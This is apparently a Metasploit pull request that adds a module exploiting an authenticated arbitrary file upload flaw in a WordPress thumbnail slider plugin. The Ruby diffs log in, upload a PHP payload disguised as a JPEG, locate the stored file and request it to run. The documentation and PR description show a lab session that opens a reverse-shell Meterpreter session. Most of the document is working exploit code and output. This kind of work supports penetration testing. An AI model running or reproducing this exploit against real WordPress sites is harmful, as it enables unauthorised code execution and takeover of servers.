### PR TITLE
Add Responsive Thumbnail Slider Plugin Exploit Module

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md
+++ b/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md
@@ -1,0 +1,51 @@
+
+## Vulnerable Application
+
+  This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. 
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]```
+  4. Do: ```set RHOSTS [IP]```
+  5. Do: ```set TARGETURI [URI]```
+  6. Do: ```set USERNAME [USERNAME]```
+  7. Do: ```set PASSWORD [PASS]```
+  8. Do: ```run```
+  9. You should get a shell.
+
+## Scenarios
+
+### Test on Windows 7 x86 running WordPress v4.9.7
+
+  ```
+  msf5 > use exploit/multi/http/wp_responsive_thumbnail_slider_upload 
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165
+  rhosts => 192.168.37.165
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress
+  targeturi => wordpress
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test
+  username => test
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password
+  password => password
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check
+  [*] 192.168.37.165:80 The target service is running, but could not be validated.
+  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] WordPress accessed
+  [+] Logged into WordPress
+  [+] Successful upload
+  [*] Sending stage (37775 bytes) to 192.168.37.165
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:54322) at 2018-07-26 14:41:02 -0500
+
+  meterpreter > getuid
+  Server username: lab (0)
+  meterpreter > sysinfo
+  Computer    : WIN7-LAB
+  OS          : Windows NT WIN7-LAB 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586
+  Meterpreter : php/windows
+  meterpreter >
+
+  ```

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # check for WordPress
+    # check if plugin is installed
   end
 
   # log into Wordpress
   # access 'manage images' page
   # upload file
-  def exploit
+  def login
+    wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
+    res = send_request_cgi(
+    'method'  =>  'GET',
+    'uri'     =>  wp_uri
+    )
+
+    if res && res.body.include?("WordPress") && res.body.include?("200")
+      print_status("WordPress accessed")
+    else
+      fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
+    end
+
+    redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
+    cookies = res.get_cookies
+    wp_login_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  wp_uri,
+      'cookie'  =>  cookies,
+      'vars_post' => {
+        'log' =>  datastore['USERNAME'],
+        'pwd' =>  datastore['PASSWORD'],
+        'wp-submit' =>  'Log In',
+        'redirect_to' => redirect_uri
+      }
+    )
+
+    auth_cookies = wp_login_res.get_cookies
+    auth_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  redirect_uri,
+      'cookie'  =>  auth_cookies
+    )
+
+    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
+
+    print_good("Logged into WordPress")
+    upload_payload(auth_cookies)
   end
 
+  def upload_payload(cookies)
+    # attempt to access plugins page
+    plugin_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
+      'cookie'  =>  cookies
+    )
+
+    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
+      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
+    end
+
+    # generate payload
+  end
+
+  def exploit
+   login
+  end
 end

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
+      'Description'    => %q{
+        Say something that the user might need to know
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Arash Khazaei', # EDB PoC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'EDB', '37998' ]
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 28 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
+      ])
+  end
+
+  def check
+  end
+
+  # log into Wordpress
+  # access 'manage images' page
+  # upload file
+  def exploit
+  end
+
+end

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -93,6 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_payload(cookies)
+    file_payload = get_write_exec_payload
+    file_name = "#{rand_text_alpha(5)}.php"
+
     # attempt to access plugins page
     plugin_res = send_request_cgi(
       'method'  =>  'GET',
@@ -104,7 +108,29 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
     end
 
-    # generate payload
+    data = Rex::MIME::Message.new
+    data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
+    data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
+    data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
+    post_data = data.to_s
+
+    upload_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management&action=addedit'),
+      'cookie'  =>  cookies,
+      'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
+      'data'    =>  post_data
+    )
+
+    #if upload_res.code == 200
+     # image_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'), 'cookie' => cookies)
+    #end
+
+    res = send_request_raw(
+      'uri' => normalize_uri(target_uri.path.to_s, 'wp-content/uploads/wp-responsive-images-thumbnail-slider/02ac868d9fce78c048b2144beaba5d5c.php'),
+      'method' => 'GET',
+      'cookie' => cookies
+    )
   end
 
   def exploit

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
         OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
-        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
       ])
   end
 
@@ -50,9 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # check if plugin is installed
   end
 
-  # log into Wordpress
-  # access 'manage images' page
-  # upload file
   def login
     wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
     res = send_request_cgi(
@@ -94,13 +91,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_payload(cookies)
-    file_payload = get_write_exec_payload
+    manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
+    file_payload = get_write_exec_payload(:unlink_self => true)
     file_name = "#{rand_text_alpha(5)}.php"
 
     # attempt to access plugins page
     plugin_res = send_request_cgi(
       'method'  =>  'GET',
-      'uri'     =>  normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri),
       'cookie'  =>  cookies
     )
 
@@ -114,20 +112,29 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
     post_data = data.to_s
 
+    # upload the file
     upload_res = send_request_cgi(
       'method'  =>  'POST',
-      'uri'     =>  normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management&action=addedit'),
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
       'cookie'  =>  cookies,
       'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
       'data'    =>  post_data
     )
 
-    #if upload_res.code == 200
-     # image_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'), 'cookie' => cookies)
-    #end
+    page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
+    fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
 
-    res = send_request_raw(
-      'uri' => normalize_uri(target_uri.path.to_s, 'wp-content/uploads/wp-responsive-images-thumbnail-slider/02ac868d9fce78c048b2144beaba5d5c.php'),
+    retrieve_file(page, cookies)
+  end
+
+  def retrieve_file(res, cookies)
+    fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
+    fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
+    file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
+
+    print_good("Successful upload")
+    execute = send_request_raw(
+      'uri' => file_uri,
       'method' => 'GET',
       'cookie' => cookies
     )

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
-      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
+      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
     end
 
     data = Rex::MIME::Message.new

--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
       'Description'    => %q{
-        Say something that the user might need to know
+        This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'Arash Khazaei', # EDB PoC
@@ -46,8 +46,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # check for WordPress
-    # check if plugin is installed
+    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  plugin_uri
+    )
+
+    unless res && res.code == 200
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Detected
   end
 
   def login
@@ -57,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     'uri'     =>  wp_uri
     )
 
-    if res && res.body.include?("WordPress") && res.body.include?("200")
+    if res && res.body.include?("WordPress") && res.code == 200
       print_status("WordPress accessed")
     else
       fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
@@ -141,6 +151,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-   login
+   unless check == Exploit::CheckCode::Safe
+     login
+   end
   end
 end


### PR DESCRIPTION
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.

## Verification

- [x] Start `msfconsole`
- [x] `use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]`
- [x] `set RHOSTS [IP]`
- [x] `set TARGETURI [URI]`
- [x] `set USERNAME [USERNAME]`
- [x] `set PASSWORD [PASS]`
- [x] `run`
- [x] You should get a shell.

## Scenarios

```
  msf5 > use exploit/multi/http/wp_responsive_thumbnail_slider_upload
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165
  rhosts => 192.168.37.165
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress
  targeturi => wordpress
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test
  username => test
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password
  password => password
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check
  [*] 192.168.37.165:80 The target service is running, but could not be validated.
  msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] WordPress accessed
  [+] Logged into WordPress
  [+] Successful upload
  [*] Sending stage (37775 bytes) to 192.168.37.165
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:54322) at 2018-07-26 14:41:02 -0500

  meterpreter > getuid
  Server username: lab (0)
  meterpreter > sysinfo
  Computer    : WIN7-LAB
  OS          : Windows NT WIN7-LAB 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586
  Meterpreter : php/windows
  meterpreter >
```
